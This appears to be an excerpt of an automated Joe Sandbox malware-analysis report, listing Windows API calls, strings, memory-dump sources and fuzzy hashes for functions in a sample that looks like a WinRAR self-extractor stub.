                  • Instruction Fuzzy Hash: D8417D75D00618AADF26DBA4DC49EEE7FBCBB59305F0040A6E509E7061EB719AC8CB50
                  APIs
                  • ShowWindow.USER32(?,00000000), ref: 005A964E
                  • GetWindowRect.USER32(?,00000000), ref: 005A9693
                  • ShowWindow.USER32(?,00000005,00000000), ref: 005A972A
                  • SetWindowTextW.USER32(?,00000000), ref: 005A9732
                  • ShowWindow.USER32(00000000,00000005), ref: 005A9748
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: Window$Show$RectText
                  • String ID: RarHtmlClassName
                  • API String ID: 3937224194-1658105358
                  • Opcode ID: 5b8799972b4d57d9043fd541d6607fd814aaa1dc7b9c0dfd0345a9842a9da579
                  • Instruction ID: 084aaaca985f7d6d71fc3e74b87f2e2f92b3d356566e7604f02ae2fcdc37d637
                  • Opcode Fuzzy Hash: 5b8799972b4d57d9043fd541d6607fd814aaa1dc7b9c0dfd0345a9842a9da579
                  • Instruction Fuzzy Hash: 6331AE71004220AFCB119F64DD4DF6F7FA8FF49701F008559FA499A162CB38D958DBA5
                  APIs
                    • Part of subcall function 005BBF79: _free.LIBCMT ref: 005BBFA2
                  • _free.LIBCMT ref: 005BC003
                    • Part of subcall function 005B84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,005BBFA7,005C3958,00000000,005C3958,00000000,?,005BBFCE,005C3958,00000007,005C3958,?,005BC3CB,005C3958), ref: 005B84F4
                    • Part of subcall function 005B84DE: GetLastError.KERNEL32(005C3958,?,005BBFA7,005C3958,00000000,005C3958,00000000,?,005BBFCE,005C3958,00000007,005C3958,?,005BC3CB,005C3958,005C3958), ref: 005B8506
                  • _free.LIBCMT ref: 005BC00E
                  • _free.LIBCMT ref: 005BC019
                  • _free.LIBCMT ref: 005BC06D
                  • _free.LIBCMT ref: 005BC078
                  • _free.LIBCMT ref: 005BC083
                  • _free.LIBCMT ref: 005BC08E
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast
                  • String ID:
                  • API String ID: 776569668-0
                  • Opcode ID: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
                  • Instruction ID: a9d02f13b5433953f678d7ef440ac0a4c4c4f8d7ec4ccdbf2ba2600495ecb6c4
                  • Opcode Fuzzy Hash: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
                  • Instruction Fuzzy Hash: 4B11F171540706F6EA20B771CD0BFEBBF9DBF84700F408855729966452DBA5F9048B90
                  APIs
                  • GetLastError.KERNEL32(?,?,005B20C1,005AFB12), ref: 005B20D8
                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 005B20E6
                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 005B20FF
                  • SetLastError.KERNEL32(00000000,?,005B20C1,005AFB12), ref: 005B2151
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: ErrorLastValue___vcrt_
                  • String ID:
                  • API String ID: 3852720340-0
                  • Opcode ID: b0d8112e34758e7864c016f992925fd8cb1fc2f877880c10da92a7128aeb1d8e
                  • Instruction ID: 4f30d172a7ef4132e7bf15afc1c2f3f88871a00bf5c992b5f7a5317757e316f5
                  • Opcode Fuzzy Hash: b0d8112e34758e7864c016f992925fd8cb1fc2f877880c10da92a7128aeb1d8e
                  • Instruction Fuzzy Hash: 7001D8321197126EE7642BB97C8A9EB2E88FB61774B210A29F210650E0EE117C45E254
                  APIs
                  • GetLastError.KERNEL32(?,005D0EE8,00000200,005B895F,005B58FE,?,?,?,?,0059D25E,?,02EC3560,00000063,00000004,0059CFE0,?), ref: 005B902E
                  • _free.LIBCMT ref: 005B9063
                  • _free.LIBCMT ref: 005B908A
                  • SetLastError.KERNEL32(00000000,005C3958,00000050,005D0EE8), ref: 005B9097
                  • SetLastError.KERNEL32(00000000,005C3958,00000050,005D0EE8), ref: 005B90A0
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: ErrorLast$_free
                  • String ID: X\
                  • API String ID: 3170660625-3186185854
                  • Opcode ID: 8cad08b1cb694a195cebe124b861f8a220820d4de2a09b4b34d84ede3d53be6a
                  • Instruction ID: 9169c5462fc1d2910eb331173717255398083366fcaa623e0340189d2c176693
                  • Opcode Fuzzy Hash: 8cad08b1cb694a195cebe124b861f8a220820d4de2a09b4b34d84ede3d53be6a
                  • Instruction Fuzzy Hash: C8014476505E0A6FC33237796C8EDFB2E2DBBE07753300024F605A2292EF20EC05A120
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID:
                  • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                  • API String ID: 0-1718035505
                  • Opcode ID: b198b03c17a7201cd8f377487445845870ecab039f980adf8a8acb4a01fb1754
                  • Instruction ID: c47d9c51c146ff58130f165b1ef7ad2d9edeba51949b2a82d9eb804f0c8bbf58
                  • Opcode Fuzzy Hash: b198b03c17a7201cd8f377487445845870ecab039f980adf8a8acb4a01fb1754
                  • Instruction Fuzzy Hash: 6B01F9326427225F4F207EB45C95AAE5FB4BA53323364553EE503E3640EA55CC86E6B0
                  APIs
                  • _free.LIBCMT ref: 005B807E
                    • Part of subcall function 005B84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,005BBFA7,005C3958,00000000,005C3958,00000000,?,005BBFCE,005C3958,00000007,005C3958,?,005BC3CB,005C3958), ref: 005B84F4
                    • Part of subcall function 005B84DE: GetLastError.KERNEL32(005C3958,?,005BBFA7,005C3958,00000000,005C3958,00000000,?,005BBFCE,005C3958,00000007,005C3958,?,005BC3CB,005C3958,005C3958), ref: 005B8506
                  • _free.LIBCMT ref: 005B8090
                  • _free.LIBCMT ref: 005B80A3
                  • _free.LIBCMT ref: 005B80B4
                  • _free.LIBCMT ref: 005B80C5
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast
                  • String ID: \
                  • API String ID: 776569668-1951137136
                  • Opcode ID: 0ff61c3e63efb93990c88bfa628476d6bc5a5b5ad018ac6676d93575bdd4978a
                  • Instruction ID: 2e6b00219a4a2072ceac9f1e7d7344893018ebe95f30a06c5e4c3dd4b6d1c22f
                  • Opcode Fuzzy Hash: 0ff61c3e63efb93990c88bfa628476d6bc5a5b5ad018ac6676d93575bdd4978a
                  • Instruction Fuzzy Hash: A5F01D78801926CF8B116B56BD068B63E69F724764308560AF401DAA74CF39185AFFC9
                  APIs
                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 005A0D0D
                    • Part of subcall function 0059ACF5: GetVersionExW.KERNEL32(?), ref: 0059AD1A
                  • LocalFileTimeToFileTime.KERNEL32(?,005A0CB8), ref: 005A0D31
                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 005A0D47
                  • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 005A0D56
                  • SystemTimeToFileTime.KERNEL32(?,005A0CB8), ref: 005A0D64
                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 005A0D72
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: Time$File$System$Local$SpecificVersion
                  • String ID:
                  • API String ID: 2092733347-0
                  • Opcode ID: 7b47bcc6e85a19b9405351cc8d21f4af61503cc5814f72e5fe1175d17d032eda
                  • Instruction ID: fdcafb61a932a3d774f2cec31a340ac799c30fe17df431cf1a8c536fa824a57b
                  • Opcode Fuzzy Hash: 7b47bcc6e85a19b9405351cc8d21f4af61503cc5814f72e5fe1175d17d032eda
                  • Instruction Fuzzy Hash: D431937A91020EAECB00DFE5D8859EEBBB8FF58700B04455AE955E7210E730AA45CB65
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: _memcmp
                  • String ID:
                  • API String ID: 2931989736-0
                  • Opcode ID: 8e7c03252db9c03fd0f0fec853ac5d55ef6c098789df663646aee863346471b0
                  • Instruction ID: 46409ca1b4457c2fddbf924212c1c1eed185a565fb55be0f3100de3b4d45a361
                  • Opcode Fuzzy Hash: 8e7c03252db9c03fd0f0fec853ac5d55ef6c098789df663646aee863346471b0
                  • Instruction Fuzzy Hash: 4E2181B560011EBBEB059E94CC81F6F7FADBF92B84B108929FC099A201F270ED459790
                  APIs
                  • WaitForSingleObject.KERNEL32(?,0000000A), ref: 005AD2F2
                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 005AD30C
                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 005AD31D
                  • TranslateMessage.USER32(?), ref: 005AD327
                  • DispatchMessageW.USER32(?), ref: 005AD331
                  • WaitForSingleObject.KERNEL32(?,0000000A), ref: 005AD33C
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                  • String ID:
                  • API String ID: 2148572870-0
                  • Opcode ID: c4add2a97ba9797718367660c12852989065af0a71f983a93cc37befd765a190
                  • Instruction ID: 5f397744d6a51dd9e9f797e915854f4a09714bef44bf809cb71b3e1e293a4403
                  • Opcode Fuzzy Hash: c4add2a97ba9797718367660c12852989065af0a71f983a93cc37befd765a190
                  • Instruction Fuzzy Hash: 88F01DB2A0111DBBCB206BA5DC4CDEFBF7DEF62351F008412B606D2010DA388545D6B1
                  APIs
                  • _wcschr.LIBVCRUNTIME ref: 005AC435
                    • Part of subcall function 005A17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0059BB05,00000000,.exe,?,?,00000800,?,?,005A85DF,?), ref: 005A17C2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: CompareString_wcschr
                  • String ID: <$HIDE$MAX$MIN
                  • API String ID: 2548945186-3358265660
                  • Opcode ID: 8a4379fffe54d6140e9a464f964a76a09eb9d69dfcb23e8178813203024bec71
                  • Instruction ID: ed46addac0030a573b083de38c3623a465ebb9e55a0d59bf6f2e897332a18d17
                  • Opcode Fuzzy Hash: 8a4379fffe54d6140e9a464f964a76a09eb9d69dfcb23e8178813203024bec71
                  • Instruction Fuzzy Hash: 5731827690460DAADF21DA94DC55EEE7FBCFB59300F004066FA0996050EBB19EC4CA50
                  APIs
                    • Part of subcall function 0059130B: GetDlgItem.USER32(00000000,00003021), ref: 0059134F
                    • Part of subcall function 0059130B: SetWindowTextW.USER32(00000000,005C35B4), ref: 00591365
                  • EndDialog.USER32(?,00000001), ref: 005AA9DE
                  • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 005AA9F6
                  • SetDlgItemTextW.USER32(?,00000067,?), ref: 005AAA24
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: ItemText$DialogWindow
                  • String ID: GETPASSWORD1$xj^
                  • API String ID: 445417207-3588992345
                  • Opcode ID: 09e5e6c7f43eefe1f503ebc7a2b55db36aca91719d9cd145ebdbfd8ff90657cc
                  • Instruction ID: 9a6dd806769aba1c76f3bb7e4f10a8d53db08943de2b23446f3a9568f5420a1a
                  • Opcode Fuzzy Hash: 09e5e6c7f43eefe1f503ebc7a2b55db36aca91719d9cd145ebdbfd8ff90657cc
                  • Instruction Fuzzy Hash: 341108339401197ADB219A649D09FFF7FBCFB5A710F000421FA45F2090D7659D95D672
                  APIs
                  • LoadBitmapW.USER32(00000065), ref: 005AADFD
                  • GetObjectW.GDI32(00000000,00000018,?), ref: 005AAE22
                  • DeleteObject.GDI32(00000000), ref: 005AAE54
                  • DeleteObject.GDI32(00000000), ref: 005AAE77
                    • Part of subcall function 005A9E1C: FindResourceW.KERNEL32(005AAE4D,PNG,?,?,?,005AAE4D,00000066), ref: 005A9E2E
                    • Part of subcall function 005A9E1C: SizeofResource.KERNEL32(00000000,00000000,?,?,?,005AAE4D,00000066), ref: 005A9E46
                    • Part of subcall function 005A9E1C: LoadResource.KERNEL32(00000000,?,?,?,005AAE4D,00000066), ref: 005A9E59
                    • Part of subcall function 005A9E1C: LockResource.KERNEL32(00000000,?,?,?,005AAE4D,00000066), ref: 005A9E64
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
                  • String ID: ]
                  • API String ID: 142272564-3352871620
                  • Opcode ID: ec753928218e1e4dacfd70231a9e7a7ade6222984c84aca81a270fd2faaee47e
                  • Instruction ID: 1f18da0816c1962b95aecfc15c46fc250c760f220afd81de9ebe7b6c33f8144a
                  • Opcode Fuzzy Hash: ec753928218e1e4dacfd70231a9e7a7ade6222984c84aca81a270fd2faaee47e
                  • Instruction Fuzzy Hash: 0A01C036541226A6C71167649C0DA7F7FAEBBD3B52F180015BD00EB291DF358C19D6B2
                  APIs
                    • Part of subcall function 0059130B: GetDlgItem.USER32(00000000,00003021), ref: 0059134F
                    • Part of subcall function 0059130B: SetWindowTextW.USER32(00000000,005C35B4), ref: 00591365
                  • EndDialog.USER32(?,00000001), ref: 005ACCDB
                  • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 005ACCF1
                  • SetDlgItemTextW.USER32(?,00000066,?), ref: 005ACD05
                  • SetDlgItemTextW.USER32(?,00000068), ref: 005ACD14
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: ItemText$DialogWindow
                  • String ID: RENAMEDLG
                  • API String ID: 445417207-3299779563
                  • Opcode ID: 33bbba9f64960d7879da20dfec171e4e1e447419d02ca29439833f57905d6124
                  • Instruction ID: 708819a427de0e4e4425207c0c18d831b71a77eddc33d9256962289459977c1e
                  • Opcode Fuzzy Hash: 33bbba9f64960d7879da20dfec171e4e1e447419d02ca29439833f57905d6124
                  • Instruction Fuzzy Hash: 4501F5326942507AD7114B649C0AF6B3FACBB6B712F200411F34AE60A0C6655D08DB75
                  APIs
                  • ___BuildCatchObject.LIBVCRUNTIME ref: 005B251A
                    • Part of subcall function 005B2B52: ___AdjustPointer.LIBCMT ref: 005B2B9C
                  • _UnwindNestedFrames.LIBCMT ref: 005B2531
                  • ___FrameUnwindToState.LIBVCRUNTIME ref: 005B2543
                  • CallCatchBlock.LIBVCRUNTIME ref: 005B2567
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                  • String ID: /)[
                  • API String ID: 2633735394-1957678936
                  • Opcode ID: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
                  • Instruction ID: 1c7be66c5fa6ce0d4e2aa76d778605387072bb7fcdff6a911ee78924a035cb60
                  • Opcode Fuzzy Hash: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
                  • Instruction Fuzzy Hash: B4011732000109BBCF229F55DC55EDA3FBAFF99710F058414F91866160C336E962EFA1
                  APIs
                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,005B7573,00000000,?,005B7513,00000000,005CBAD8,0000000C,005B766A,00000000,00000002), ref: 005B75E2
                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 005B75F5
                  • FreeLibrary.KERNEL32(00000000,?,?,?,005B7573,00000000,?,005B7513,00000000,005CBAD8,0000000C,005B766A,00000000,00000002), ref: 005B7618
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: AddressFreeHandleLibraryModuleProc
                  • String ID: CorExitProcess$mscoree.dll
                  • API String ID: 4061214504-1276376045
                  • Opcode ID: 9e1cf1e851793749d7bdb1f834f3279e444618185917422828942018d99740d6
                  • Instruction ID: f48eed9adda904d60937b4919a6c31761b1ab69fe15faa775bc4b87e67f6758d
                  • Opcode Fuzzy Hash: 9e1cf1e851793749d7bdb1f834f3279e444618185917422828942018d99740d6
                  • Instruction Fuzzy Hash: C7F03C71A18A1CBFDB159F94DC09FDDBFB9FB58711F144068E805A2150EB309A88DA94
                  APIs
                    • Part of subcall function 005A0085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 005A00A0
                    • Part of subcall function 005A0085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0059EB86,Crypt32.dll,00000000,0059EC0A,?,?,0059EBEC,?,?,?), ref: 005A00C2
                  • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0059EB92
                  • GetProcAddress.KERNEL32(005D81C0,CryptUnprotectMemory), ref: 0059EBA2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
